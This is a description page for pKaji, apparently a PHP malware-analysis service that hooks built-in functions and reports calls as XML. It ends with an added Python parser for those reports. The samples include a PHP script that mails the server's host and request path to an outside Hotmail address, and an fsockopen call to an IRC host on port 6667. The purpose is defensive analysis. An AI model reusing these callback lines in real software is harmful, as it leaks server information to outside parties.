pKaji is a service that analyzes suspicious PHP code files and facilitates the quick
detection of network activities and all kinds of malicious code using a hooking technique.


About pKaji

pKaji is a free service provided by MyCERT which analyzes suspicious PHP code files and facilitates quick detection of network activities and all kinds of malicious code using the hooking technique. It uses the APD (Advanced PHP Debugger) extension to hook the original PHP built-in functions.

Using pKaji

To use pKaji, upload a valid PHP file smaller than 1 Mb at https://blog.honeynet.org.my/pKaji/. The pKaji front end forwards the request to the pKaji-core engine. The process will probably take a few minutes, depending on the server workload.

The result of the analysis is shown in XML format, displaying each parameter sent to each function called.

Output Example

PHP code: set_time_limit(0);
XML output:
<function_call>
    <name>set_time_limit</name>
    <parameter>seconds=0</parameter>
</function_call>

PHP code: fsockopen("irc.neoshell.org","6667", &$err_num, &$err_msg, 30);
XML output:
<function_call>
    <name>fsockopen</name>
    <parameter>host=irc.neoshell.org, port=6667, , , 30</parameter>
</function_call>

PHP code: echo "ID: ShiroHige<br>";
XML output:
<function_call>
    <name>echo</name>
    <parameter>$str="ID: ShiroHige<br>"</parameter>
</function_call>

PHP code: @getenv("SERVER_ADDR");
XML output:
<function_call>
    <name>getenv</name>
    <parameter>$varname=SERVER_ADDR</parameter>
</function_call>

Sample Analysis

Input File:
<?php //=================================
//
// scan inb0x hotmail v1.0
//
//
// priv8 file
//=================================
//
ini_set("max_execution_time",-1);
set_time_limit(0);
$user = @get_current_user();
$email = "$user";
$assunto = "te-adoro";
$email1 = "c0d3zinhu@hotmail.com";
$headers = "From: \r\n";
if(mail($email1, $assunto, $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'], $headers)){
echo "Opa, enviado!"; exit();
} else{
echo "Não enviei.."; exit();
} ?>

XML Output
<pkaji>
    <file_name>7869801b2e71993b9696e2b498f6f750.php</file_name>
    <function_call>
        <name>ini_set</name>
        <parameter>$varname=max_execution_time, $newvalue=-1</parameter>
    </function_call>
    <function_call>
        <name>set_time_limit</name>
        <parameter>seconds=0</parameter>
    </function_call>
    <function_call>
        <name>get_current_user</name>
        <parameter></parameter>
    </function_call>
    <function_call>
        <name>mail</name>
        <parameter>$to='c0d3zinhu@hotmail.com' ,$subject='te-adoro' , $message='' , $additional_headers='From: ' , $additional_parameters='' </parameter>
    </function_call>
    <function_call>
        <name>echo</name>
        <parameter>$str="Não enviei.."</parameter>
    </function_call>
</pkaji>
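
A report in this format can be triaged mechanically. The Python sketch below is an added example, not part of pKaji or of the original page: it extracts function_call records with a regular expression (the Output Example above displays raw markup such as <br> inside a parameter, which a strict XML parser would reject), tags them against a watch table, and pulls out the contacted host:port and mail recipient. The WATCH table and the function names are hypothetical; REPORT is constructed from records shown on this page, and sample.php is a placeholder file name.

```python
import re

# Constructed report: records copied from this page's examples; sample.php is a placeholder.
REPORT = """<pkaji>
    <file_name>sample.php</file_name>
    <function_call>
        <name>fsockopen</name>
        <parameter>host=irc.neoshell.org, port=6667, , , 30</parameter>
    </function_call>
    <function_call>
        <name>mail</name>
        <parameter>$to='c0d3zinhu@hotmail.com' ,$subject='te-adoro' , $message='' , $additional_headers='From: ' , $additional_parameters='' </parameter>
    </function_call>
    <function_call>
        <name>echo</name>
        <parameter>$str="ID: ShiroHige<br>"</parameter>
    </function_call>
</pkaji>"""

# Hypothetical triage table (an assumption of this example, not a pKaji feature).
WATCH = {"fsockopen": "network", "mail": "mail", "getenv": "recon",
         "get_current_user": "recon", "set_time_limit": "runtime-limit", "ini_set": "runtime-limit"}

# Non-greedy match up to </parameter>, so raw markup inside a value is tolerated.
CALL_RE = re.compile(r"<function_call>\s*<name>(.*?)</name>\s*"
                     r"<parameter>(.*?)</parameter>\s*</function_call>", re.S)

def parse_calls(report):
    """Return [(function_name, raw_parameter_string), ...] in call order."""
    return [(n.strip(), p.strip()) for n, p in CALL_RE.findall(report)]

def triage(report):
    """Return (function, category, parameters) for every watched call."""
    return [(n, WATCH[n], p) for n, p in parse_calls(report) if n in WATCH]

def indicators(report):
    """Extract host:port from fsockopen calls and the recipient from mail calls."""
    found = set()
    for name, params in parse_calls(report):
        if name == "fsockopen" and (m := re.search(r"host=([^,\s]+),\s*port=(\d+)", params)):
            found.add(f"{m.group(1)}:{m.group(2)}")
        elif name == "mail" and (m := re.search(r"\$to='([^']*)'", params)):
            found.add(m.group(1))
    return sorted(found)

if __name__ == "__main__":
    print(triage(REPORT), indicators(REPORT))
```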


IRC Channel

#pkaji on freenode